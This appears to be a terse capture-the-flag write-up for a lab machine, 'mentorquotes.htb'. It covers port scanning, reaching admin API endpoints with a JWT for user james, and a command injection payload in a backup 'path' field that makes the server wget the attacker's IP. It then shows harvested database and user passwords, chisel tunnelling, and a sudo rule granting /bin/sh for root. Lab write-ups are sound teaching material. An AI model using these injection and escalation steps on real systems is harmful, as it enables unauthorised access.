Open 10.129.84.190:22
Open 10.129.84.190:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
If you check http://api.mentorquotes.htb/docs/ you'll see that the authors user name seems to be james and his mailaddress is james@mentorquotes.htb
We will use james as username with a different address to get access to any admin endpoint.
Poking around didn't show any results that are interesting. Assuming that this endpoints is being used to get or create backups we will check for Command Injections.
# Setup python server to check for callbacks
python -m http.server 80
# Try to trick the server into using wget to contact us
curl -X 'POST' 'http://api.mentorquotes.htb/admin/backup' -H 'Content-Type: application/json' -H 'Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lczFAbWVudG9ycXVvdGVzLmh0YiJ9.tqY0iQHU85zAkvffr--v1MMbO37NSNJs0Fo9ZMqRz48' -d '{ "body": "a", "path": ";wget 10.10.14.75" }'
ls -al
total 9044
drwxr-xr-x 1 root root 4096 Dec 12 00:58 .
drwxr-xr-x 1 root root 4096 Nov 10 16:00 ..
-rw-r--r-- 1 root root 1024 Jun 12 2022 .Dockerfile.swp
-rw-r--r-- 1 root root 522 Nov 3 12:58 Dockerfile
drwxr-xr-x 1 root root 4096 Dec 12 00:54 app
Within the app directory we'll find a file called db.py which will indicate that a postgres db is running on IP 172.22.0.1.
# Database url if none is passed the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
Priv Esc
Postgres
We will setup chisel for portfowarding/tunneling and check the database
We can use svc:123meunomeeivani to access the main server.
User: James
Since there was no obvious way for privilege escalation to root we started checking for basic things like passwords that has been set somewhere and could be accessed by anyone
Using the password SuperSecurePassword123__ we are able to become james
Root
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User james may run the following commands on mentor:
(ALL) /bin/sh